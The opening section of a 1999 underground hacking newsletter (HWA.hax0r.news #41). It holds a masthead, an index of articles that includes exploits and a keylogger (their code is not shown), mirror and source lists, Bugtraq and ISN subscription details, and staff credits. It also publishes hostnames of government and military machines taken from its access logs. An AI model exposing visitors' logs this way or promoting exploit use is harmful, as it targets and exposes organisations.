[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 41 Volume 1 1999 *Nov 7th 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== * This issue covers Oct 31st to Nov 7th but was released on Nov 14th ========================================================================== "ABUSUS NON TOLLIT USUM" ========================================================================== Today the spotlight may be on you, some interesting machines that have accessed these archives recently... infosec.se gate2.mcbutler.usmc.mil sc034ws109.nosc.mil shq-ot-1178.nosc.mil dhcp-036190.scott.af.mil mcreed.lan.teale.ca.gov dodo.nist.gov kwai11.nsf.gov enduser.faa.gov vasfw02,fdic.gov lisa.defcen.gov.au ps1.pbgc.gov guardian.gov.sg amccss229116.scott.af.mil sc022ws224.nosc.mil sheppard2.hurlburt.af.mil marshall.us-state.gov digger1.defence.gov.au firewall.mendoza.gov.ar ipaccess.gov.ru gatekeeper.itsec-debis.de fgoscs.itsec-debis.de fhu-ed4ccdf.fhu.disa.mil citspr.tyndall.af.mil kelsatx2.kelly.af.mil kane.sheppard.af.mil relay5.nima.mil host.198-76-34-33.gsa.gov ntsrvr.vsw.navy.mil saic2.nosc.mil wygate.wy.blm.gov mrwilson.lanl.gov p722ar.npt.nuwc.navy.mil ws088228.ramstein.af.mil car-gw.defence.gov.au unknown-c-23-147.latimes.com nytgate1.nytimes.com =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= http://welcome.to/HWA.hax0r.news/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= Web site sponsored by CUBESOFT networks http://www.csoft.net check them out for great fast web hosting! http://www.csoft.net/~hwa =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= The Hacker's Ethic Sadly, due to the traditional ignorance and sensationalizing of the mass media, the once-noble term hacker has become a perjorative. Among true computer people, being called a hacker is a compliment. One of the traits of the true hacker is a profoundly antibureaucratic and democratic spirit. That spirit is best exemplified by the Hacker's Ethic. This ethic was best formulated by Steven Levy in his 1984 book Hackers: Heroes of the Computer Revolution. Its tenets are as follows: 1 - Access to computers should be unlimited and total. 2 - All information should be free. 3 - Mistrust authority - promote decentralization. 4 - Hackers should be judged by their hacking not bogus criteria such as degrees, age, race, or position. 5 - You create art and beauty on a computer, 6 - Computers can change your life for the better. The Internet as a whole reflects this ethic. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= A Comment on FORMATTING: Oct'99 - Started 80 column mode format, code is still left untouched since formatting will destroy syntax. I received an email recently about the formatting of this newsletter, suggesting that it be formatted to 75 columns in the past I've endevoured to format all text to 80 cols except for articles and site statements and urls which are posted verbatim, I've decided to continue with this method unless more people complain, the zine is best viewed in 1024x768 mode with UEDIT.... - Ed =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= New mirror sites http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ http://net-security.org/hwahaxornews http://www.sysbreakers.com/hwa http://www.attrition.org/hosted/hwa/ http://www.ducktank.net/hwa/issues.html. http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwazine.cjb.net/ http://www.hackunlimited.com/files/secu/papers/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ * http://hwa.hax0r.news.8m.com/ * http://www.fortunecity.com/skyscraper/feature/103/ * Crappy free sites but they offer 20M & I need the space... ** Some issues are not located on these sites since they exceed the file size limitations imposed by the sites :-( please only use these if no other recourse is available. HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net thanks to airportman for the Cubesoft bandwidth. Also shouts out to all our mirror sites! and p0lix for the (now expired) digitalgeeks archive tnx guys. http://www.csoft.net/~hwa HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. *DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.projectgamma.com/archives/zines/hwa/ http://www.403-security.org/Htmls/hwa.hax0r.news.htm =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= SYNOPSIS (READ THIS) -------------------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #41 =-----------------------------------------------------------------------= We could use some more people joining the channel, its usually pretty quiet, we don't bite (usually) so if you're hanging out on irc stop by and idle a while and say hi... ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #weirdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =--------------------------------------------------------------------------= Issue #41 =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Intros =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ `ABUSUS NON TOLLIT USUM'? This is (in case you hadn't guessed) Latin, and loosely translated it means "Just because something is abused, it should not be taken away from those who use it properly). This is our new motto. =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. 03.0 .. Fix Available For Very Powerful IIS Exploit ..................... 04.0 .. ULG Defaces Associated Press Web Site ........................... 05.0 .. Jane's To Host Cyber Terrorism Conference ....................... 06.0 .. Trust Site Solution Released .................................... 07.0 .. Hacker or Cracker or Neither. Which Word to Use? ................ 08.0 .. New Virus Discovered in London .................................. 09.0 .. Krystalia, In Memorium .......................................... 10.0 .. RealNetworks Changes Privacy Policy Amid Controversy ............ 11.0 .. JTF-CND Runs CyberWar Simulation ................................ 12.0 .. State Y2K Data Vulnerable ....................................... 13.0 .. Clinton Privacy Plan: Is it Enough? ............................. 14.0 .. Tempest Laws Reviewed ........................................... 15.0 .. Russians Seize Nuclear Expert's Computer ........................ 16.0 .. Sir Dystic and Kevin Poulsen to Speak ........................... 17.0 .. Invisible KeyLogger97 ........................................... 18.0 .. Hoax: Gov-boi Killed in Car Accident (not)....................... 19.0 .. Australia Admits to Echelon ..................................... 20.0 .. DVD Copy Protection Broken ...................................... 21.0 .. Optus in Australia Compromised .................................. 22.0 .. Romanian Finance Ministry Hit ................................... 23.0 .. Reuters News Database Compromised ............................... 24.0 .. Taiwan Vulnerable to Cyber Attack ............................... 25.0 .. 30,000 Virus Threats Received by Authorities .................... 26.0 .. Stupid User Mistakes (are a) Bigger Problem than Viruses ........ 27.0 .. Echelon Education Website Launched .............................. 28.0 .. FTC Says Screw You and Your Privacy ............................. 29.0 .. ParseTV to Adopt New Format ..................................... 30.0 .. Meridian I hacking by BL4CKM1LK teleph0nics...................... 31.0 .. Adobe Fingers EBay Pirates ...................................... 32.0 .. India, Syria, Iran Have Offensive Cyberwar Abilities ............ 33.0 .. Singapore Launches Probe Into Defacement ........................ 34.0 .. Military Sites Invaded .......................................... 35.0 .. Emergency FidNet Funding Canceled ............................... 36.0 .. Cyberattacks Against DOD up 300 Percent ......................... 37.0 .. White House Says US Vulnerable to Cyber Attack .................. 38.0 .. Russia Withholding Information on Computer Attacks .............. 39.0 .. Who is Richard Smith? ........................................... 40.0 .. Federal Guidelines for Searching and Seizing Computers .......... 41.0 .. Canadian Defense Site Defaced ................................... 42.0 .. Defacement of South Africa Statistics Site Investigated ......... 43.0 .. BT Network Administation/SYSTEM X/OMC network ops by Hybrid...... 44.0 .. Defeating the Caller ID system by Hybrid......................... 45.0 .. A buffer overflow exists on the VirusWall smtp gateway........... 46.0 .. The Xnews guid................................................... 47.0 .. BUFFER OVERFLOW IN IMG VIEWER.................................... 48.0 .. Eserv 2.50 Web interface Server Directory Traversal Vulnerability 49.0 .. RFP9906 - RFPoison............................................... 50.0 .. Realnetworks server buffer overflow exploit...................... 51.0 .. NT Print spooler vulnerability................................... 52.0 .. Bind remote exploit (ADM)........................................ 53.0 .. Security Focus Newsletter #13.................................... =-------------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information....................................... Current dates: POSTPONED til further notice, place: TBA.......... Ha.Ha .. Humour and puzzles ............................................ Hey You!........................................................ =------=........................................................ Send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. Stuff you can email: - Prank phone calls in .ram or .mp* format - Fone tones and security announcements from PBX's etc - fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities) - reserved for one smiley face -> :-) <- - PHACV lists of files that you have or phac cd's you own (we have a burner, *g*) - burns of phac cds (email first to make sure we don't already have em) - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp* If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas2@usa.net Websites; sAs72.......................: http://members.tripod.com/~sAs72/ Cruciphux...................: http://www.geocities.com/Area51/Lair/8913/ @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/ NewsTrolls .(daily news ).........http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ *DOWN* News/Humour site+ ................http://www.innerpulse.com News/Techie news site.............http://www.slashdot.org +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=hack http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://ech0.cjb.net ech0 Security http://axon.jccc.net/hir/ Hackers Information Report http://net-security.org Net Security http://www.403-security.org Daily news and security related site Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html Link About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) UPDATED Sept/99 - Sent in by Androthi, tnx for the update ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I am pleased to inform you of several changes that will be occurring on June 5th. I hope you find them as exciting as I do. BUGTRAQ moves to a new home --------------------------- First, BUGTRAQ will be moving from its current home at NETSPACE.ORG to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read below. Other than the change of domains nothing of how the list is run changes. I am still the moderator. We play by the same rules. Security Focus will be providing mail archives for BUGTRAQ. The archives go back longer than Netspace's and are more complete than Geek-Girl's. The move will occur one week from today. You will not need to resubscribe. All your information, including subscription options will be moved transparently. Any of you using mail filters (e.g. procmail) to sort incoming mail into mail folders by examining the From address will have to update them to include the new address. The new address will be: BUGTRAQ@SECURITYFOCUS.COM Security Focus also be providing a free searchable vulnerability database. BUGTRAQ es muy bueno -------------------- It has also become apparent that there is a need for forums in the spirit of BUGTRAQ where non-English speaking people or people that don't feel comfortable speaking English can exchange information. As such I've decided to give BUGTRAQ in other languages a try. BUGTRAQ will continue to be the place to submit vulnerability information, but if you feel more comfortable using some other language you can give the other lists a try. All relevant information from the other lists which have not already been covered here will be translated and forwarded on by the list moderator. In the next couple of weeks we will be introducing BUGTRAQ-JP (Japanese) which will be moderated by Nobuo Miwa and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A. from Argentina (the folks that brought you Secure Syslog and the SSH insertion attack). What is Security Focus? ----------------------- Security Focus is an exercise in creating a community and a security resource. We hope to be able to provide a medium where useful and successful resources such as BUGTRAQ can occur, while at the same time providing a comprehensive source of security information. Aside from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl herself!) have moved over to Security Focus to help us with building this new community. The other staff at Security Focus are largely derived from long time supporters of Bugtraq and the community in general. If you are interested in viewing the staff pages, please see the 'About' section on www.securityfocus.com. On the community creating front you will find a set of forums and mailing lists we hope you will find useful. A number of them are not scheduled to start for several weeks but starting today the following list is available: * Incidents' Mailing List. BUGTRAQ has always been about the discussion of new vulnerabilities. As such I normally don't approve messages about break-ins, trojans, viruses, etc with the exception of wide spread cases (Melissa, ADM worm, etc). The other choice people are usually left with is email CERT but this fails to communicate this important information to other that may be potentially affected. The Incidents mailing list is a lightly moderated mailing list to facilitate the quick exchange of security incident information. Topical items include such things as information about rootkits new trojan horses and viruses, source of attacks and tell-tale signs of intrusions. To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body of: SUBS INCIDENTS FirstName, LastName Shortly we'll also be introducing an Information Warfare forum along with ten other forums over the next two months. These forums will be built and moderated by people in the community as well as vendors who are willing to take part in the community building process. *Note to the vendors here* We have several security vendors who have agreed to run forums where they can participate in the online communities. If you would like to take part as well, mail Alfred Huger, ahuger@securityfocus.com. On the information resource front you find a large database of the following: * Vulnerabilities. We are making accessible a free vulnerability database. You can search it by vendor, product and keyword. You will find detailed information on the vulnerability and how to fix it, as well are links to reference information such as email messages, advisories and web pages. You can search by vendor, product and keywords. The database itself is the result of culling through 5 years of BUGTRAQ plus countless other lists and news groups. It's a shining example of how thorough full disclosure has made a significant impact on the industry over the last half decade. * Products. An incredible number of categorized security products from over two hundred different vendors. * Services. A large and focused directory of security services offered by vendors. * Books, Papers and Articles. A vast number of categorized security related books, papers and articles. Available to download directly for our servers when possible. * Tools. A large array of free security tools. Categorized and available for download. * News: A vast number of security news articles going all the way back to 1995. * Security Resources: A directory to other security resources on the net. As well as many other things such as an event calendar. For your convenience the home-page can be personalized to display only information you may be interested in. You can filter by categories, keywords and operating systems, as well as configure how much data to display. I'd like to thank the fine folks at NETSPACE for hosting the site for as long as they have. Their services have been invaluable. I hope you find these changes for the best and the new services useful. I invite you to visit http://www.securityfocus.com/ and check it out for yourself. If you have any comments or suggestions please feel free to contact me at this address or at aleph1@securityfocus.com. Cheers. -- Aleph One / aleph1@underground.org http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed UPDATED Sept/99 - Sent in by Androthi, tnx for the update ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --[ New ISN announcement (New!!) Sender: ISN Mailing List From: mea culpa Subject: Where has ISN been? Comments: To: InfoSec News To: ISN@SECURITYFOCUS.COM It all starts long ago, on a network far away.. Not really. Several months ago the system that hosted the ISN mail list was taken offline. Before that occured, I was not able to retrieve the subscriber list. Because of that, the list has been down for a while. I opted to wait to get the list back rather than attempt to make everyone resubscribe. As you can see from the headers, ISN is now generously being hosted by Security Focus [www.securityfocus.com]. THey are providing the bandwidth, machine, and listserv that runs the list now. Hopefully, this message will find all ISN subscribers, help us weed out dead addresses, and assure you the list is still here. If you have found the list to be valuable in the past, please tell friends and associates about the list. To subscribe, mail listserv@securityfocus.com with "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn". As usual, comments and suggestions are welcome. I apologize for the down time of the list. Hopefully it won't happen again. ;) mea_culpa www.attrition.org --[ Old ISN welcome message [Last updated on: Mon Nov 04 0:11:23 1998] InfoSec News is a privately run, medium traffic list that caters to distribution of information security news articles. These articles will come from newspapers, magazines, online resources, and more. The subject line will always contain the title of the article, so that you may quickly and effeciently filter past the articles of no interest. This list will contain: o Articles catering to security, hacking, firewalls, new security encryption, products, public hacks, hoaxes, legislation affecting these topics and more. o Information on where to obtain articles in current magazines. o Security Book reviews and information. o Security conference/seminar information. o New security product information. o And anything else that comes to mind.. Feedback is encouraged. The list maintainers would like to hear what you think of the list, what could use improving, and which parts are "right on". Subscribers are also encouraged to submit articles or URLs. If you submit an article, please send either the URL or the article in ASCII text. Further, subscribers are encouraged to give feedback on articles or stories, which may be posted to the list. Please do NOT: * subscribe vanity mail forwards to this list * subscribe from 'free' mail addresses (ie: juno, hotmail) * enable vacation messages while subscribed to mail lists * subscribe from any account with a small quota All of these generate messages to the list owner and make tracking down dead accounts very difficult. I am currently receiving as many as fifty returned mails a day. Any of the above are grounds for being unsubscribed. You are welcome to resubscribe when you address the issue(s). Special thanks to the following for continued contribution: William Knowles, Aleph One, Will Spencer, Jay Dyson, Nicholas Brawn, Felix von Leitner, Phreak Moi and other contributers. ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn ISN Archive: http://www.landfield.com/isn ISN Archive: http://www.jammed.com/Lists/ISN/ ISN is Moderated by 'mea_culpa' . ISN is a private list. Moderation of topics, member subscription, and everything else about the list is solely at his discretion. The ISN membership list is NOT available for sale or disclosure. ISN is a non-profit list. Sponsors are only donating to cover bandwidth and server costs. @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/programming/IRC+ man in black sas2@usa.net .............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black twisted-pair@home.com......: currently active/programming/IRC+ Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Qubik ............................: United Kingdom D----Y ...........................: USA/world media HWA members ......................: World Media Past Foreign Correspondants (currently inactive or presumed dead) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sla5h.............................: Croatia N0Portz ..........................: Australia system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland Wyze1.............................: South Africa Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed Spikeman's site is down as of this writing, if it comes back online it will be posted here. http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) Sla5h's email: smuddo@yahoo.com ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the 